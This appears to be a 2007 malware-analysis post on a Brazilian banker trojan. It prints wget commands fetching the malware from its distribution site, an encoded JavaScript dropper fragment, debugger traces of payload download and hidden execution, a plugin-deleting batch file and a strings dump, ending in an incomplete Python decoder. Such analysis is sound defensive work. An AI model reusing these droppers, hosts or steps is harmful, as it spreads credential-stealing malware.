Brazilian Banker Trojan

Thanks to einstein for the submission

Found at

http://www.pupinini.com.br/aspnet_client/static.htm?Imagem=145879652148962

According to Einstein, this site is spreading a banker through JavaScript code included in the HTML.

45a31ae4473eaec28f7cd72453a207c7

Not packed.

If you hit it with IE it installs the malware. Wget with a user agent gave me a location to download the exe directly.

C:\>wget --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" http://www.pupinini.com.br/aspnet_client/static.htm?Imagem=145879652148962

00000000 00000000 0
00000040 00000040 0
000000A1 000000A1 0 ::internet::
000000CA 000000CA 0
00000114 00000114 0
0000011D 0000011D 0
00000125 00000125 0
0000094B 0000094B 0 %20Q%20%3D%20df.createobject%28%22Shell.Application%22%2C%22%22%29%0D%0A%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%20%20%20%20%3Chead%3E%0D%0A%20%20%20%20%3Ctitle%3E%5BLMURDOC%5D%20%7C%7C%20404%20%3C/title%3E%0D%0A%20%20%20%20%3C/head%3E%3Cbody%3E%0D%0A%3Ccenter%3E%3Cembed%20src%3D%22%22%20pluginspage%3D%22%22%20type%3D%22application/x-shockwave-flash%22%20width%3D%2250%22%20height%3D%2220%22%3E%20%20%3C/embed%3E%0D%0A%20%20%20%20%0D%0A%20%20%20%20%3C%21--%20%3Cscript%3Elocation.href%3D%27http%3A//google.com%27%3C/script%3E%20--%3E%0D%0A%20%20%20%20%3C/body%3E%0D%0A%0D%0A%20%20%20%20%3C/html%3E%0D%0A"
00000C0C 00000C0C 0 function SetNewWords()
00000C27 00000C27 0 var NewWords;
00000C3B 00000C3B 0 NewWords = unescape(Words);
00000C5D 00000C5D 0 document.write(NewWords);
00000C81 00000C81 0 SetNewWords();
00000C91 00000C91 0 // -->
00000C99 00000C99 0

C:\>wget --user-agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" http://www.pupinini.com.br/aspnet_client/flash.exe

AntiVir 7.3.0.21 01.05.2007 TR/Delphi.Downloader.Gen
Authentium 4.93.8 12.30.2006 no virus found
Avast 4.7.892.0 12.30.2006 no virus found
AVG 386 01.06.2007 no virus found
BitDefender 7.2 01.06.2007 BehavesLike:Trojan.Downloader
CAT-QuickHeal 9.00 01.06.2007 no virus found
ClamAV devel-20060426 01.06.2007 no virus found
DrWeb 4.33 01.06.2007 no virus found
eSafe 7.0.14.0 01.05.2007 no virus found
eTrust-InoculateIT 23.73.107 01.06.2007 no virus found
eTrust-Vet 30.3.3307 01.06.2007 no virus found
Ewido 4.0 01.06.2007 no virus found
Fortinet 2.82.0.0 01.06.2007 suspicious
F-Prot 3.16f 01.05.2007 no virus found
F-Prot4 4.2.1.29 01.05.2007 no virus found
Ikarus T3.1.0.27 01.06.2007 no virus found
Kaspersky 4.0.2.24 01.06.2007 no virus found
McAfee 4933 01.05.2007 no virus found
Microsoft 1.1904 01.06.2007 no virus found
NOD32v2 1960 01.06.2007 probably a variant of Win32/TrojanDownloader.Banload.JM
Norman 5.80.02 12.31.2007 W32/Downloader
Panda 9.0.0.4 01.06.2007 Suspicious file
Prevx1 V2 01.07.2007 no virus found
Sophos 4.13.0 01.05.2007 no virus found
Sunbelt 2.2.907.0 01.05.2007 no virus found
TheHacker 6.0.3.143 01.05.2007 no virus found
UNA 1.83 01.06.2007 no virus found
VBA32 3.11.1 01.06.2007 no virus found
VirusBuster 4.3.19:9 01.06.2007 no virus found

Some events

0012FF58 004120BE /CALL to CreateEventA from flash.004120B9
0012FF5C 00000000 |pSecurity = NULL
0012FF60 FFFFFFFF |ManualReset = TRUE
0012FF64 00000000 |InitiallySignaled = FALSE
0012FF68 004120D4 \EventName = ""

0012E3A8 762C316F /CALL to CreateEventA from CRYPT32.762C3169
0012E3AC 0012E3DC |pSecurity = 0012E3DC
0012E3B0 00000001 |ManualReset = TRUE
0012E3B4 00000000 |InitiallySignaled = FALSE
0012E3B8 762DF298 \EventName = "Global\\crypt32LogoffEvent"

0012EBC8 |00153608 ASCII "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

An Exec

0012FF98 00412C53 /CALL to WinExec from flash.00412C4E
0012FF9C 00413844 |CmdLine = "C:\\WINDOWS\\system32\\wpabalnm.exe"
0012FFA0 00000000 \ShowState = SW_HIDE

I set a breakpoint on URLDownloadToFileA and got:

0012FF58 00412550 RETURN to flash.00412550 from
0012FF5C 00000000
0012FF60 00900A54 ASCII "http://www.attack.com.br/IMAGES/gol.jpg"
0012FF64 00412D1C ASCII "C:\\WINDOWS\\system32\\wpabalnm.exe"

CREATES FILES:

wpabalnm.exe 1502

IEXPLORE.EXE:1476 CREATE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\static[1].htm SUCCESS Options: Create Access: All
IEXPLORE.EXE:1476 CREATE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\YEP42GJS\flash[1].exe SUCCESS Options: Create Access: All
wpabalnm.exe:820 CREATE C:\WINDOWS\sysuphatch.exe SUCCESS Options: OverwriteIf Sequential Access: All
wpabalnm.exe:820 CREATE C:\start.bat SUCCESS Options: OverwriteIf Access: All
schtasks.exe:1892 CREATE C:\WINDOWS NAME COLLISION Options: Create Directory Access: All
schtasks.exe:1892 CREATE C:\WINDOWS\Tasks NAME COLLISION Options: Create Directory Access: All
schtasks.exe:1892 CREATE C:\WINDOWS\Tasks\startt.job SUCCESS Options: Create Sequential Access: All

Contents of start.bat are:

@echo off
del c:\windows\downlo~1\gb*.*
del c:\windows\downlo~1\*.g??
del c:\windows\downlo~1\g*.*

Creates a scheduled task called startt that is set to run at system startup and runs start.bat.

2299 4:22:21 PM IEXPLORE.EXE:1476 WRITE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\Y1SKCUOY\static[1].htm SUCCESS Offset: 2564 Length: 670
2420 4:22:25 PM IEXPLORE.EXE:1476 WRITE C:\Documents and Settings\macdaddy\Local Settings\Temporary Internet Files\Content.IE5\YEP42GJS\flash[1].exe SUCCESS Offset: 0 Length: 704
2663 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 0 Length: 65536
2664 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 65536 Length: 28672
2665 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 0 Length: 65536
2666 4:22:28 PM IEXPLORE.EXE:1476 WRITE C: SUCCESS Offset: 65536 Length: 28672

2936 4:23:05 PM wpabalnm.exe:820 WRITE C:\WINDOWS\sysuphatch.ini SUCCESS Offset: 0 Length: 10
2947 4:23:05 PM wpabalnm.exe:820 CREATE C:\WINDOWS\sysuphatch.exe SUCCESS Options: OverwriteIf Sequential Access: All

2995 4:23:08 PM wpabalnm.exe:820 CREATE C:\start.bat SUCCESS Options: OverwriteIf Access: All
3001 4:23:08 PM wpabalnm.exe:820 WRITE C:\start.bat SUCCESS Offset: 0 Length: 103
3141 4:23:09 PM schtasks.exe:1892 WRITE C:\WINDOWS\Tasks\startt.job SUCCESS Offset: 0 Length: 192

At some point it must create wpabalnm.exe, but I don't see where yet.

wpabalnm.exe is packed with pecompact 2

STRINGS

00000050 00400050 0 This program must be run under Win32
00000270 00400270 0 .idata
000002C0 004002C0 0 .rdata
000002E7 004002E7 0 P.reloc
0000030F 0040030F 0 P.rsrc
00000406 00401006 0 StringX
00000459 00401059 0 TObjectd
00000466 00401066 0 TObjectX
00000478 00401078 0 System
00000486 00401086 0 IInterface
000004A6 004010A6 0 System
0000054D 0040114D 0 TInterfacedObject
000021D0 00402DD0 0 SOFTWARE\Borland\Delphi\RTL
000021EC 00402DEC 0 FPUMaskValue
00003DEC 004049EC 0 kernel32.dll
00003DFC 004049FC 0 GetLongPathNameA
00004040 00404C40 0 Software\Borland\Locales
0000405C 00404C5C 0 Software\Borland\Delphi\Locales
00004EF6 00405AF6 0 ExceptionL[@
00004F4D 00405B4D 0 EHeapException
00004FA9 00405BA9 0 EOutOfMemory
00005005 00405C05 0 EInOutError\\@
0000505C 00405C5C 0 EExternal
000050B5 00405CB5 0 EExternalException
00005114 00405D14 0 EIntError
0000516D 00405D6D 0 EDivByZero
000051C5 00405DC5 0 ERangeError
0000521D 00405E1D 0 EIntOverflow
00005279 00405E79 0 EMathError
000052D1 00405ED1 0 EInvalidOp
00005329 00405F29 0 EZeroDivide
00005380 00405F80 0 EOverflow
000053D9 00405FD9 0 EUnderflow
00005431 00406031 0 EInvalidPointer
0000548D 0040608D 0 EInvalidCast
000054E9 004060E9 0 EConvertError
00005545 00406145 0 EAccessViolation
000055A5 004061A5 0 EPrivilege
000055FD 004061FD 0 EStackOverflow
00005658 00406258 0 EControlC
000056B1 004062B1 0 EVariantError
0000570D 0040630D 0 EAssertionFailed
0000576D 0040636D 0 EAbstractError
000057C9 004063C9 0 EIntfCastError
00005825 00406425 0 EOSError
0000587D 0040647D 0 ESafecallException
000058AA 004064AA 0 SysUtils
000058CE 004064CE 0 SysUtils
00005931 00406531 0 TThreadLocalCounter
00005A0C 0040660C 0 $TMultiReadExclusiveWriteSynchronizer
00005EA4 00406AA4 0 False
00006A44 00407644 0 INFNAN
00009259 00409E59 0 TErrorRec
000092DA 00409EDA 0 TExceptRec
0000A438 0040B038 0 kernel32.dll
0000A448 0040B048 0 GetDiskFreeSpaceExA
0000AF60 0040BB60 0 kernel32.dll
0000AF70 0040BB70 0 CreateToolhelp32Snapshot
0000AF8C 0040BB8C 0 Heap32ListFirst
0000AF9C 0040BB9C 0 Heap32ListNext
0000AFAC 0040BBAC 0 Heap32First
0000AFB8 0040BBB8 0 Heap32Next
0000AFC4 0040BBC4 0 Toolhelp32ReadProcessMemory
0000AFE0 0040BBE0 0 Process32First
0000AFF0 0040BBF0 0 Process32Next
0000B000 0040BC00 0 Process32FirstW
0000B010 0040BC10 0 Process32NextW
0000B020 0040BC20 0 Thread32First
0000B030 0040BC30 0 Thread32Next
0000B040 0040BC40 0 Module32First
0000B050 0040BC50 0 Module32Next
0000B060 0040BC60 0 Module32FirstW
0000B070 0040BC70 0 Module32NextW
0000B7C0 0040C3C0 0 oleaut32.dll
0000B7D0 0040C3D0 0 VariantChangeTypeEx
0000B7E4 0040C3E4 0 VarNeg
0000B7EC 0040C3EC 0 VarNot
0000B7F4 0040C3F4 0 VarAdd
0000B7FC 0040C3FC 0 VarSub
0000B804 0040C404 0 VarMul
0000B80C 0040C40C 0 VarDiv
0000B814 0040C414 0 VarIdiv
0000B81C 0040C41C 0 VarMod
0000B824 0040C424 0 VarAnd
0000B82C 0040C42C 0 VarOr
0000B834 0040C434 0 VarXor
0000B83C 0040C43C 0 VarCmp
0000B844 0040C444 0 VarI4FromStr
0000B854 0040C454 0 VarR4FromStr
0000B864 0040C464 0 VarR8FromStr
0000B874 0040C474 0 VarDateFromStr
0000B884 0040C484 0 VarCyFromStr
0000B894 0040C494 0 VarBoolFromStr
0000B8A4 0040C4A4 0 VarBstrFromCy
0000B8B4 0040C4B4 0 VarBstrFromDate
0000B8C4 0040C4C4 0 VarBstrFromBool
0000B9ED 0040C5ED 0 TCustomVariantType
0000BA06 0040C606 0 TCustomVariantType
0000BA23 0040C623 0 Variants
0000BA7D 0040C67D 0 EVariantInvalidOpError
0000BAE1 0040C6E1 0 EVariantTypeCastError
0000BB45 0040C745 0 EVariantOverflowError
0000BBA9 0040C7A9 0 EVariantInvalidArgError
0000BC0D 0040C80D 0 EVariantBadVarTypeErrorp
0000BC71 0040C871 0 EVariantBadIndexError
0000BCD5 0040C8D5 0 EVariantArrayLockedError
0000BD3D 0040C93D 0 EVariantArrayCreateError
0000BDA5 0040C9A5 0 EVariantNotImplError
0000BE09 0040CA09 0 EVariantOutOfMemoryError
0000BE71 0040CA71 0 EVariantUnexpectedError
0000BED5 0040CAD5 0 EVariantDispatchError
0000C178 0040CD78 0 t?Htb
0000CA6D 0040D66D 0 QQQQSV
0000D994 0040E594 0 Empty
0000D9B4 0040E5B4 0 Smallint
0000D9C8 0040E5C8 0 Integer
0000D9D8 0040E5D8 0 Single
0000D9E8 0040E5E8 0 Double
0000D9F8 0040E5F8 0 Currency
0000DA1C 0040E61C 0 OleStr
0000DA2C 0040E62C 0 Dispatch
0000DA40 0040E640 0 Error
0000DA50 0040E650 0 Boolean
0000DA60 0040E660 0 Variant
0000DA70 0040E670 0 Unknown
0000DA80 0040E680 0 Decimal
0000DA9C 0040E69C 0 ShortInt
0000DAD0 0040E6D0 0 LongWord
0000DAE4 0040E6E4 0 Int64
0000DC28 0040E828 0 String
0000DC44 0040E844 0 Array
0000DC54 0040E854 0 ByRef
0000DC9A 0040E89A 0 Variants
0000DDE0 0040E9E0 0 SVWUQ
0000DF77 0040EB77 0 t~hpXA
0000E1C4 0040EDC4 0 False
0000E28D 0040EE8D 0 EStreamError
0000E2E9 0040EEE9 0 EFileStreamError
0000E349 0040EF49 0 EFCreateError
0000E3A5 0040EFA5 0 EFOpenError
0000E3FD 0040EFFD 0 EFilerErrorT
0000E455 0040F055 0 EReadError
0000E4AD 0040F0AD 0 EWriteError
0000E505 0040F105 0 EListError
0000E55D 0040F15D 0 EStringListError
0000E5CD 0040F1CD 0 TList
0000E621 0040F221 0 TThreadListx
0000E693 0040F293 0 TPersistent
0000E6A6 0040F2A6 0 TPersistentx
0000E6BC 0040F2BC 0 Classes
0000E6CE 0040F2CE 0 IStringsAdapter
0000E6F3 0040F2F3 0 Classes
0000E7DF 0040F3DF 0 TStrings
0000E7EE 0040F3EE 0 TStringsL
0000E801 0040F401 0 Classes
0000E812 0040F412 0 TStringItem
0000E915 0040F515 0 TStringList$
0000E926 0040F526 0 TStringList|
0000E93C 0040F53C 0 Classes
0000E9B1 0040F5B1 0 TStream
0000EA21 0040F621 0 THandleStream
0000EA99 0040F699 0 TFileStream
0000EAF0 0040F6F0 0 TRegGroup
0000EB49 0040F749 0 TRegGroups
0000F5C8 004101C8 0 Php A
0000F5FC 004101FC 0 Strings
00012078 00412C78 0 http://www.attack.com.br/IMAGES/gol.jpg
000120A8 00412CA8 0 http://www.calixto.adv.br/aspnet_client/aspweb.dll
000120E4 00412CE4 0 http://www.calixto.adv.br/imagens/foto_12.jpg
0001211C 00412D1C 0 C:\WINDOWS\system32\wpabalnm.exe
00012148 00412D48 0 wupdmgr.exe
0001215C 00412D5C 0 svchosts.exe
00012174 00412D74 0 system32dll.exe
0001218C 00412D8C 0 svchosts.scr
000121A4 00412DA4 0 msconf.exe
000121B8 00412DB8 0 wmplayer.exe
000121D0 00412DD0 0 help.scr
000121E4 00412DE4 0 system32.exe
000121FC 00412DFC 0 WineWork.exe
00012214 00412E14 0 lsass32.exe
00012228 00412E28 0 netsh.exe
0001223C 00412E3C 0 csrs.scr
00012250 00412E50 0 wsass32.exe
00012264 00412E64 0 Microsoft.exe
0001227C 00412E7C 0 install.exe
00012290 00412E90 0 amsn.exe
000122A4 00412EA4 0 servico.exe
000122B8 00412EB8 0 hpztsb02.exe
000122D0 00412ED0 0 expert.exe
000122E4 00412EE4 0 ImgPaint.exe
000122FC 00412EFC 0 winsys.exe
00012310 00412F10 0 nvcpll.exe
00012324 00412F24 0 regserver.exe
0001233C 00412F3C 0 wgalogon.exe
00012354 00412F54 0 WinNT.exe
00012368 00412F68 0 C:\WINDOWS\wmplayer.exe
00012388 00412F88 0 c:\windows\wmplayer.exe
000123A8 00412FA8 0 C:\WINDOWS\help.scr
000123C4 00412FC4 0 c:\windows\help.scr
000123E0 00412FE0 0 C:\WINDOWS\system32.exe
00012400 00413000 0 c:\windows\system32.exe
00012420 00413020 0 C:\WINDOWS\MEDIA\WineWork.exe
00012448 00413048 0 c:\windows\MEDIA\WineWork.exe
00012470 00413070 0 C:\WINDOWS\lsass32.exe
00012490 00413090 0 c:\windows\lsass32.exe
000124B0 004130B0 0 C:\WINDOWS\netsh.exe
000124D0 004130D0 0 c:\windows\netsh.exe
000124F0 004130F0 0 C:\WINDOWS\csrs.scr
0001250C 0041310C 0 c:\windows\csrs.scr
00012528 00413128 0 C:\WINDOWS\wsass32.exe
00012548 00413148 0 c:\windows\wsass32.exe
00012568 00413168 0 C:\WINDOWS\Microsoft.exe
0001258C 0041318C 0 c:\windows\Microsoft.exe
000125B0 004131B0 0 C:\WINDOWS\install.exe
000125D0 004131D0 0 c:\windows\install.exe
000125F0 004131F0 0 C:\WINDOWS\Config\amsn.exe
00012614 00413214 0 c:\windows\Config\amsn.exe
00012638 00413238 0 C:\WINDOWS\servico.exe
00012658 00413258 0 c:\windows\servico.exe
00012678 00413278 0 C:\WINDOWS\hpztsb02.exe
00012698 00413298 0 c:\windows\hpztsb02.exe
000126B8 004132B8 0 C:\WINDOWS\expert.exe
000126D8 004132D8 0 c:\windows\expert.exe
000126F8 004132F8 0 C:\WINDOWS\ImgPaint.exe
00012718 00413318 0 c:\windows\ImgPaint.exe
00012738 00413338 0 C:\WINDOWS\winsys.exe
00012758 00413358 0 c:\windows\winsys.exe
00012778 00413378 0 C:\WINDOWS\nvcpll.exe
00012798 00413398 0 c:\windows\nvcpll.exe
000127B8 004133B8 0 C:\WINDOWS\svchost.exe
000127D8 004133D8 0 c:\windows\svchost.exe
000127F8 004133F8 0 C:\lsass32.exe
00012810 00413410 0 C:\WINDOWS\regserver.exe
00012834 00413434 0 c:\windows\regserver.exe
00012858 00413458 0 C:\WINDOWS\wgalogon.exe
00012878 00413478 0 c:\windows\wgalogon.exe
00012898 00413498 0 C:\WINDOWS\Downloaded Program Files\GBPLUGINBB.INF
000128D4 004134D4 0 C:\WINDOWS\Downloaded Program Files\BB.GPC
00012908 00413508 0 c:\windows\SSH2.DLL
00012924 00413524 0 c:\windows\SSH2.dll
00012940 00413540 0 c:\windows\SCPSEG.DLL
00012960 00413560 0 c:\windows\SCPNESIG.BIN
00012980 00413580 0 c:\windows\SCPMNE.DLL
000129A0 004135A0 0 c:\windows\SCPNEWCT.DLL
000129C0 004135C0 0 c:\windows\SCPNEURL.DLL
000129E0 004135E0 0 c:\windows\SCPNEDNS.DLL
00012A00 00413600 0 C:\WINDOWS\Downloaded Program Files\SCPSEG.INF
00012A38 00413638 0 c:\windows\scpMIB.dll
00012A58 00413658 0 c:\windows\scpibsig.bin
00012A78 00413678 0 c:\windows\scpibwct.bin
00012A98 00413698 0 c:\windows\sshib.dll
00012AB8 004136B8 0 c:\windows\scpibdns.bin
00012AD8 004136D8 0 c:\windows\scpiburl.bin
00012AF8 004136F8 0 c:\windows\scpsssh2.inf
00012B18 00413718 0 c:\windows\system32dll.exe
00012B3C 0041373C 0 c:\windows\wupdmgr.exe
00012B5C 0041375C 0 c:\windows\svchosts.exe
00012B7C 0041377C 0 c:\windows\svchosts.scr
00012B9C 0041379C 0 c:\windows\svchost.scr
00012BBC 004137BC 0 c:\windows\msconf.exe
00012BDC 004137DC 0 c:\windows\system\svchosts.exe
00012C04 00413804 0 c:\windows\system\svchosts.scr
00012C2C 0041382C 0 c:\windows\WinNT.exe
00012C44 00413844 0 C:\WINDOWS\system32\wpabalnm.exe
00012E64 00414064 0 Error
00012E6C 0041406C 0 Runtime error at 00000000
00012E8C 0041408C 0 0123456789ABCDEF
00012F7C 0041417C 0 %.*d0Y@
000136B0 004162B0 0 kernel32.dll
000136C0 004162C0 0 DeleteCriticalSection
000136D8 004162D8 0 LeaveCriticalSection
000136F0 004162F0 0 EnterCriticalSection
00013708 00416308 0 InitializeCriticalSection
00013724 00416324 0 VirtualFree
00013732 00416332 0 VirtualAlloc
00013742 00416342 0 LocalFree
0001374E 0041634E 0 LocalAlloc
0001375C 0041635C 0 GetTickCount
0001376C 0041636C 0 QueryPerformanceCounter
00013786 00416386 0 GetVersion
00013794 00416394 0 GetCurrentThreadId
000137AA 004163AA 0 InterlockedDecrement
000137C2 004163C2 0 InterlockedIncrement
000137DA 004163DA 0 VirtualQuery
000137EA 004163EA 0 WideCharToMultiByte
00013800 00416400 0 MultiByteToWideChar
00013816 00416416 0 lstrlenA
00013822 00416422 0 lstrcpynA
0001382E 0041642E 0 LoadLibraryExA
00013840 00416440 0 GetThreadLocale
00013852 00416452 0 GetStartupInfoA
00013864 00416464 0 GetProcAddress
00013876 00416476 0 GetModuleHandleA
0001388A 0041648A 0 GetModuleFileNameA
000138A0 004164A0 0 GetLocaleInfoA
000138B2 004164B2 0 GetCommandLineA
000138C4 004164C4 0 FreeLibrary
000138D2 004164D2 0 FindFirstFileA
000138E4 004164E4 0 FindClose
000138F0 004164F0 0 ExitProcess
000138FE 004164FE 0 WriteFile
0001390A 0041650A 0 UnhandledExceptionFilter
00013926 00416526 0 RtlUnwind
00013932 00416532 0 RaiseException
00013944 00416544 0 GetStdHandle
00013952 00416552 0 user32.dll
00013960 00416560 0 GetKeyboardType
00013972 00416572 0 LoadStringA
00013980 00416580 0 MessageBoxA
0001398E 0041658E 0 CharNextA
00013998 00416598 0 advapi32.dll
000139A8 004165A8 0 RegQueryValueExA
000139BC 004165BC 0 RegOpenKeyExA
000139CC 004165CC 0 RegCloseKey
000139D8 004165D8 0 oleaut32.dll
000139E8 004165E8 0 SysFreeString
000139F8 004165F8 0 SysReAllocStringLen
00013A0E 0041660E 0 SysAllocStringLen
00013A20 00416620 0 kernel32.dll
00013A30 00416630 0 TlsSetValue
00013A3E 0041663E 0 TlsGetValue
00013A4C 0041664C 0 LocalAlloc
00013A5A 0041665A 0 GetModuleHandleA
00013A6C 0041666C 0 kernel32.dll
00013A7C 0041667C 0 WriteFile
00013A88 00416688 0 WinExec
00013A92 00416692 0 WaitForSingleObject
00013AA8 004166A8 0 VirtualQuery
00013AB8 004166B8 0 TerminateProcess
00013ACC 004166CC 0 SetFilePointer
00013ADE 004166DE 0 SetEvent
00013AEA 004166EA 0 SetEndOfFile
00013AFA 004166FA 0 ResetEvent
00013B08 00416708 0 ReadFile
00013B14 00416714 0 OpenProcess
00013B22 00416722 0 LeaveCriticalSection
00013B3A 0041673A 0 InitializeCriticalSection
00013B56 00416756 0 GetVersionExA
00013B66 00416766 0 GetThreadLocale
00013B78 00416778 0 GetStringTypeExA
00013B8C 0041678C 0 GetStdHandle
00013B9C 0041679C 0 GetProcAddress
00013BAE 004167AE 0 GetModuleHandleA
00013BC2 004167C2 0 GetModuleFileNameA
00013BD8 004167D8 0 GetLocaleInfoA
00013BEA 004167EA 0 GetLocalTime
00013BFA 004167FA 0 GetLastError
00013C0A 0041680A 0 GetFullPathNameA
00013C1E 0041681E 0 GetDiskFreeSpaceA
00013C32 00416832 0 GetDateFormatA
00013C44 00416844 0 GetCurrentThreadId
00013C5A 0041685A 0 GetCPInfo
00013C66 00416866 0 GetACP
00013C70 00416870 0 FormatMessageA
00013C82 00416882 0 FindFirstFileA
00013C94 00416894 0 FindClose
00013CA0 004168A0 0 FileTimeToLocalFileTime
00013CBA 004168BA 0 FileTimeToDosDateTime
00013CD2 004168D2 0 EnumCalendarInfoA
00013CE6 004168E6 0 EnterCriticalSection
00013CFE 004168FE 0 DeleteFileA
00013D0C 0041690C 0 DeleteCriticalSection
00013D24 00416924 0 CreateFileA
00013D32 00416932 0 CreateEventA
00013D42 00416942 0 CompareStringA
00013D54 00416954 0 CloseHandle
00013D60 00416960 0 user32.dll
00013D6E 0041696E 0 MessageBoxA
00013D7C 0041697C 0 LoadStringA
00013D8A 0041698A 0 GetSystemMetrics
00013D9E 0041699E 0 CharNextA
00013DAA 004169AA 0 CharToOemA
00013DB6 004169B6 0 kernel32.dll
00013DC6 004169C6 0 Sleep
00013DCC 004169CC 0 URLMON.DLL
00013DDA 004169DA 0 URLDownloadToFileA
00013DEE 004169EE 0 oleaut32.dll
00013DFE 004169FE 0 SafeArrayPtrOfIndex
00013E14 00416A14 0 SafeArrayGetUBound
00013E2A 00416A2A 0 SafeArrayGetLBound
00013E40 00416A40 0 SafeArrayCreate
00013E52 00416A52 0 VariantChangeType
00013E66 00416A66 0 VariantCopy
00013E74 00416A74 0 VariantClear
00013E84 00416A84 0 VariantInit
00016DEE 0041C1EE 0 batepapo
00016DF9 0041C1F9 0 IniFiles
00016E03 0041C203 0 "RTLConsts
00016E10 0041C210 0 System
00016E19 0041C219 0 SysInit
00016E22 0041C222 0 KWindows
00016E2C 0041C22C 0 UTypes
00016E35 0041C235 0 SysUtils
00016E40 0041C240 0 SysConst
00016E4B 0041C24B 0 Classes
00016E54 0041C254 0 3Messages
00016E5F 0041C25F 0 CVariants
00016E6A 0041C26A 0 $VarUtils
00016E75 0041C275 0 QTypInfo
00016E7F 0041C27F 0 sActiveX
00016E89 0041C289 0 8Registry
00016E95 0041C295 0 TlHelp32
00016EA0 0041C2A0 0 UrlMon
00015E00 0041B200 0 PACKAGEINFO
00015F30 0041B330 0 Stream write error
000160EE 0041B4EE 0 Invalid property value List capacity out of bounds (%d)
00016772 0041BB72 0 %s (%s, line %d)
00016A66 0041BE66 0 Write$Error creating variant or safe array)Variant or safe array index out of bounds
00016D80 0041C180 0 Floating point underflow
00015E18 0041B218 65424 List count out of bounds (%d)
00015E54 0041B254 65425 List index out of bounds (%d)
00015E90 0041B290 65426 Stream read error
00015EB4 0041B2B4 65427 %s.Seek not implemented
00015EE4 0041B2E4 65428 Operation not allowed on sorted list
00015F2E 0041B32E 65429 Stream write error
00015F8C 0041B38C 65443 Sunday
00015F9A 0041B39A 65444 Monday
00015FA8 0041B3A8 65445 Tuesday
00015FB8 0041B3B8 65446 Wednesday
00015FCC 0041B3CC 65447 Thursday
00015FDE 0041B3DE 65448 Friday
00015FEC 0041B3EC 65449 Saturday
00015FFE 0041B3FE 65450 Cannot assign a %s to a %s
00016034 0041B434 65451 String list does not allow duplicates
00016080 0041B480 65452 Cannot create file "%s". %s
000160B8 0041B4B8 65453 Cannot open file "%s". %s
000160EC 0041B4EC 65454 Invalid property value
0001611A 0041B51A 65455 List capacity out of bounds (%d)
0001617C 0041B57C 65456 January
0001618C 0041B58C 65457 February
0001619E 0041B59E 65458 March
000161AA 0041B5AA 65459 April
000161D2 0041B5D2 65463 August
000161E0 0041B5E0 65464 September
000161F4 0041B5F4 65465 October
00016204 0041B604 65466 November
00016216 0041B616 65467 December
00016268 0041B668 65472 Abstract Error
00016286 0041B686 65473 Access violation at address %p in module '%s'. %s of address %p
00016340 0041B740 65475 A call to an OS function failed
00016400 0041B800 65488 Variant or safe array is locked
00016440 0041B840 65489 Invalid variant type conversion
00016480 0041B880 65490 Invalid variant operation
00016500 0041B900 65492 Could not convert variant of type (%s) into type (%s)
0001656C 0041B96C 65493 Overflow while converting variant of type (%s) into type (%s)
000165E8 0041B9E8 65494 Variant overflow
0001660A 0041BA0A 65495 Invalid argument
0001662C 0041BA2C 65496 Invalid variant type
00016656 0041BA56 65497 Operation not supported
00016686 0041BA86 65498 Unexpected variant error
000166B8 0041BAB8 65499 External exception %x
000166E4 0041BAE4 65500 Assertion failed
00016706 0041BB06 65501 Interface not supported
00016736 0041BB36 65502 Exception in safecall method
00016770 0041BB70 65503 %s (%s, line %d)
000167B4 0041BBB4 65504 Invalid pointer operation
000167E8 0041BBE8 65505 Invalid class typecast
00016816 0041BC16 65506 Access violation at address %p. %s of address %p
00016878 0041BC78 65507 Access violation
0001689A 0041BC9A 65508 Stack overflow
000168B8 0041BCB8 65509 Control-C hit
000168D4 0041BCD4 65510 Privileged instruction
00016954 0041BD54 65512 Application Error
00016978 0041BD78 65513 Format '%s' invalid or incompatible with argument
000169DC 0041BDDC 65514 No argument for format '%s'
00016A14 0041BE14 65515 Variant method calls not supported
00016A64 0041BE64 65517 Write
00016A70 0041BE70 65518 Error creating variant or safe array
00016ABA 0041BEBA 65519 Variant or safe array index out of bounds
00016B30 0041BF30 65520 Out of memory
00016B4C 0041BF4C 65521 I/O error %d
00016B66 0041BF66 65522 File not found
00016B84 0041BF84 65523 Invalid filename
00016BA6 0041BFA6 65524 Too many open files
00016BCE 0041BFCE 65525 File access denied
00016BF4 0041BFF4 65526 Read beyond end of file
00016C24 0041C024 65527 Disk full
00016C38 0041C038 65528 Invalid numeric input
00016C64 0041C064 65529 Division by zero
00016C86 0041C086 65530 Range check error
00016CAA 0041C0AA 65531 Integer overflow
00016CCC 0041C0CC 65532 Invalid floating point operation
00016D0E 0041C10E 65533 Floating point division by zero
00016D4E 0041C14E 65534 Floating point overflow
00016D7E 0041C17E 65535 Floating point underflow
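Added example, not code from the original post or from Einstein's submission: a small Python script that decodes the unescape(Words) dropper statically, so the embedded markup and the ShellExecute call can be read without rendering the page in IE. The Words fragment embedded below is the tail captured in the strings dump above (the head of the string was not captured); the var Words = "..." declaration and the SAMPLE_PAGE wrapper are assumptions, since the dump does not show how Words is declared.

```python
import re

# Tail of the percent-encoded "Words" string as it appears in the strings dump
# of static.htm. Only this fragment was captured, so it is not the full payload.
WORDS_FRAGMENT = (
    "%20Q%20%3D%20df.createobject%28%22Shell.Application%22%2C%22%22%29%0D%0A"
    "%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A"
    "%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A"
    "%20%20%20%20%3Chead%3E%0D%0A"
    "%20%20%20%20%3Ctitle%3E%5BLMURDOC%5D%20%7C%7C%20404%20%3C/title%3E%0D%0A"
    "%20%20%20%20%3C/head%3E%3Cbody%3E%0D%0A"
    "%3Ccenter%3E%3Cembed%20src%3D%22%22%20pluginspage%3D%22%22%20type%3D%22"
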